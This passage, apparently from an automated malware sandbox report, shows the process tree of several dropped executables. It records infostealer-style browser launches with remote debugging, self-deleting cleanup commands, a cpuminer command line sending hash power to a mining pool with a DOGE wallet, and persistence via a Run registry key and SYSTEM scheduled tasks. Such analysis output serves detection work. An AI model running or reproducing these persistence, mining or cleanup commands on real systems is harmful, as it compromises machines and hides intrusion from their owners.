- - C:\Users\Admin\AppData\Local\Temp\a\lem.exe
    "C:\Users\Admin\AppData\Local\Temp\a\lem.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:3000
  - - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
      "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
      4⤵
      Blocklisted process makes network request
      Checks processor information in registry
      PID:5244
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        5⤵
        Uses browser remote debugging
        Drops file in Windows directory
        Enumerates system info in registry
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        
        PID:7520
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc336fcc40,0x7ffc336fcc4c,0x7ffc336fcc58
        6⤵
        
        PID:6560
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2216,i,7554534716579382597,5138680782192199466,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=2204 /prefetch:2
        6⤵
        
        PID:6844
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1756,i,7554534716579382597,5138680782192199466,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=2488 /prefetch:3
        6⤵
        Blocklisted process makes network request
        
        PID:7792
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1888,i,7554534716579382597,5138680782192199466,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=2504 /prefetch:8
        6⤵
        
        PID:6176
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3112,i,7554534716579382597,5138680782192199466,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=3132 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:5300
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3140,i,7554534716579382597,5138680782192199466,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=3240 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:7120
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4444,i,7554534716579382597,5138680782192199466,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=4424 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:3540
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4192,i,7554534716579382597,5138680782192199466,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=4244 /prefetch:8
        6⤵
        
        PID:1120
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4180,i,7554534716579382597,5138680782192199466,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=4720 /prefetch:8
        6⤵
        
        PID:7240
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
        5⤵
        Uses browser remote debugging
        
        PID:5616
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=132.0.6834.160 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=132.0.2957.140 --initial-client-data=0x240,0x244,0x248,0x23c,0x2f4,0x7ffc3011b078,0x7ffc3011b084,0x7ffc3011b090
        6⤵
        
        PID:2820
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2660,i,5600847501656183986,14236015496406922498,262144 --variations-seed-version --mojo-platform-channel-handle=2648 /prefetch:2
        6⤵
        
        PID:6936
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1664,i,5600847501656183986,14236015496406922498,262144 --variations-seed-version --mojo-platform-channel-handle=2848 /prefetch:11
        6⤵
        
        PID:2948
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2104,i,5600847501656183986,14236015496406922498,262144 --variations-seed-version --mojo-platform-channel-handle=2852 /prefetch:13
        6⤵
        
        PID:6180
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3560,i,5600847501656183986,14236015496406922498,262144 --variations-seed-version --mojo-platform-channel-handle=3580 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:7176
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3568,i,5600847501656183986,14236015496406922498,262144 --variations-seed-version --mojo-platform-channel-handle=3768 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:7896
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5004,i,5600847501656183986,14236015496406922498,262144 --variations-seed-version --mojo-platform-channel-handle=5040 /prefetch:14
        6⤵
        
        PID:8068
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4688,i,5600847501656183986,14236015496406922498,262144 --variations-seed-version --mojo-platform-channel-handle=5200 /prefetch:14
        6⤵
        
        PID:2328
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5480,i,5600847501656183986,14236015496406922498,262144 --variations-seed-version --mojo-platform-channel-handle=5444 /prefetch:14
        6⤵
        
        PID:5000
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
        5⤵
        Uses browser remote debugging
        
        PID:7852
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" & rd /s /q "C:\ProgramData\90z5x" & exit
        5⤵
        
        PID:7396
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 10
        6⤵
        Delays execution with timeout.exe
        
        PID:1956
- - C:\Users\Admin\AppData\Local\Temp\a\StCl.exe
    "C:\Users\Admin\AppData\Local\Temp\a\StCl.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2800
- - C:\Users\Admin\AppData\Local\Temp\a\untitled2.exe
    "C:\Users\Admin\AppData\Local\Temp\a\untitled2.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:5668
  - - C:\Windows\system32\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im os-setup-service.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:5788
  - - C:\Windows\system32\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ffmpeg.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:6112
  - - C:\Windows\system32\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im python.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:5556
  - - C:\Windows\system32\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im browser_broker.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:5776
  - - C:\Users\Admin\AppData\Local\Temp\a\minerlol\cpuminer-avx.exe
      "C:\Users\Admin\AppData\Local\Temp\a\minerlol\cpuminer-avx.exe" -a minotaurx -o stratum+tcp://minotaurx.na.mine.zpool.ca:7019 -u DMgypy9jqhGHL1TbHGHrBnEZxoFsM3tGiy -p c=DOGE
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:992
- - C:\Users\Admin\AppData\Local\Temp\a\random.exe
    "C:\Users\Admin\AppData\Local\Temp\a\random.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1960
- - C:\Users\Admin\AppData\Local\Temp\a\Bjkm5hE.exe
    "C:\Users\Admin\AppData\Local\Temp\a\Bjkm5hE.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    PID:3964
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
      4⤵
      Uses browser remote debugging
      Drops file in Windows directory
      Enumerates system info in registry
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      PID:4872
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc1197cc40,0x7ffc1197cc4c,0x7ffc1197cc58
        5⤵
        
        PID:5708
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1820,i,12210405446802085872,1606921998163076084,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=1816 /prefetch:2
        5⤵
        
        PID:5504
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2092,i,12210405446802085872,1606921998163076084,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=2104 /prefetch:3
        5⤵
        
        PID:4888
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2164,i,12210405446802085872,1606921998163076084,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=2536 /prefetch:8
        5⤵
        
        PID:348
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3100,i,12210405446802085872,1606921998163076084,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=3124 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:5348
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3140,i,12210405446802085872,1606921998163076084,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=3324 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:6060
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3828,i,12210405446802085872,1606921998163076084,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=4332 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:5684
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4380,i,12210405446802085872,1606921998163076084,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=4676 /prefetch:8
        5⤵
        
        PID:2452
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4368,i,12210405446802085872,1606921998163076084,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=4732 /prefetch:8
        5⤵
        
        PID:5712
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4784,i,12210405446802085872,1606921998163076084,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=4808 /prefetch:8
        5⤵
        
        PID:5476
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
      4⤵
      Uses browser remote debugging
      PID:5816
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
      4⤵
      Uses browser remote debugging
      PID:7932
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
      4⤵
      Uses browser remote debugging
      PID:5128
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
      4⤵
      Uses browser remote debugging
      Drops file in Windows directory
      Enumerates system info in registry
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of FindShellTrayWindow
      PID:8080
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=132.0.6834.160 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=132.0.2957.140 --initial-client-data=0x240,0x244,0x248,0x23c,0x2f4,0x7ffc3011b078,0x7ffc3011b084,0x7ffc3011b090
        5⤵
        
        PID:348
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2616,i,3127728418365140498,12658624877653805379,262144 --variations-seed-version --mojo-platform-channel-handle=2604 /prefetch:2
        5⤵
        
        PID:7448
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1872,i,3127728418365140498,12658624877653805379,262144 --variations-seed-version --mojo-platform-channel-handle=2768 /prefetch:11
        5⤵
        
        PID:7368
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2116,i,3127728418365140498,12658624877653805379,262144 --variations-seed-version --mojo-platform-channel-handle=2780 /prefetch:13
        5⤵
        
        PID:6536
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3656,i,3127728418365140498,12658624877653805379,262144 --variations-seed-version --mojo-platform-channel-handle=3648 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:7532
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3636,i,3127728418365140498,12658624877653805379,262144 --variations-seed-version --mojo-platform-channel-handle=3812 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:7084
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\vk6xl" & exit
      4⤵
      PID:3280
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 10
        5⤵
        Delays execution with timeout.exe
        
        PID:7112
- - C:\Users\Admin\AppData\Local\Temp\a\silk.exe
    "C:\Users\Admin\AppData\Local\Temp\a\silk.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4516
  - - C:\Users\Admin\AppData\Local\Temp\is-8U7LQ.tmp\silk.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-8U7LQ.tmp\silk.tmp" /SL5="$C0218,5943295,56832,C:\Users\Admin\AppData\Local\Temp\a\silk.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of FindShellTrayWindow
      Suspicious use of WriteProcessMemory
      PID:5236
    - - C:\Users\Admin\AppData\Local\Old Data Eraser 5.14.7.1119\olddataeraser19.exe
        
        "C:\Users\Admin\AppData\Local\Old Data Eraser 5.14.7.1119\olddataeraser19.exe" -i
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:6136
- - C:\Users\Admin\AppData\Local\Temp\a\IMG001.exe
    "C:\Users\Admin\AppData\Local\Temp\a\IMG001.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:3144
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c taskkill /f /im tftp.exe & tskill tftp.exe
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:5980
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im tftp.exe
        5⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:348
  - - C:\Users\Admin\AppData\Local\Temp\tftp.exe
      "C:\Users\Admin\AppData\Local\Temp\tftp.exe"
      4⤵
      Executes dropped EXE
      PID:5676
  - - C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe
      "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
      4⤵
      Drops startup file
      Executes dropped EXE
      Loads dropped DLL
      Adds Run key to start application
      Enumerates connected drives
      System Location Discovery: System Language Discovery
      PID:5420
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c taskkill /f /im tftp.exe & tskill tftp.exe
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5636
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im tftp.exe
        6⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        
        PID:4964
    - - C:\Users\Admin\AppData\Local\Temp\tftp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\tftp.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5380
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5732
      - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ
        6⤵
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        
        PID:4236
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4940
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
        6⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:5084
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /RU "SYSTEM" /SC ONLOGON /F /V1 /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4080
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn "UAC" /RU "SYSTEM" /SC ONLOGON /F /V1 /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
        6⤵
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:4812
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c powercfg /CHANGE -standby-timeout-ac 0 & powercfg /CHANGE -hibernate-timeout-ac 0 & Powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000
        5⤵
        Power Settings
        System Location Discovery: System Language Discovery
        
        PID:480
      - C:\Windows\SysWOW64\powercfg.exe
        
        powercfg /CHANGE -standby-timeout-ac 0
        6⤵
        Power Settings
        
        PID:1328
      - C:\Windows\SysWOW64\powercfg.exe
        
        powercfg /CHANGE -hibernate-timeout-ac 0
        6⤵
        Power Settings
        
        PID:1172
      - C:\Windows\SysWOW64\powercfg.exe
        
        Powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000
        6⤵
        Power Settings
        
        PID:4028
    - - C:\Windows\SysWOW64\cmd.exe
        
